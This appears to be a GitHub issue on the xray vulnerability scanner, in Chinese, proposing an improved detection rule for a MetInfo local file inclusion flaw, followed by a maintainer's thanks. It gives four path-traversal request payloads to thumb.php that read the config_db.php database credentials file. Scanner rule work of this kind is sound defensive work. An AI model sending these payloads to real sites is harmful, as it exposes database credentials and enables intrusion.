xray
xray copied to clipboard
metinfo-lfi-cnvd-2018-13393 的POC可完善
地址为: https://github.com/chaitin/xray/blob/master/pocs/metinfo-lfi-cnvd-2018-13393.yml 完善后的poc关键部分为
groups:
poc1:
- method: GET
path: /include/thumb.php?dir=..././http..././config/config_db.php
expression:
response.status == 200 && response.body.bcontains(b"con_db_host")
poc2:
- method: GET
path: /include/thumb.php?dir=.....///http/.....///config/config_db.php
expression:
response.status == 200 && response.body.bcontains(b"con_db_host")
poc3:
- method: GET
path: /include/thumb.php?dir=http/.....///.....///config/config_db.php
expression:
response.status == 200 && response.body.bcontains(b"con_db_host")
poc4:
- method: GET
path: /include/thumb.php?dir=http\\..\\..\\config\\config_db.php
expression:
response.status == 200 && response.body.bcontains(b"con_db_host")
感谢师傅的反馈,后续将对此poc进行规则增强处理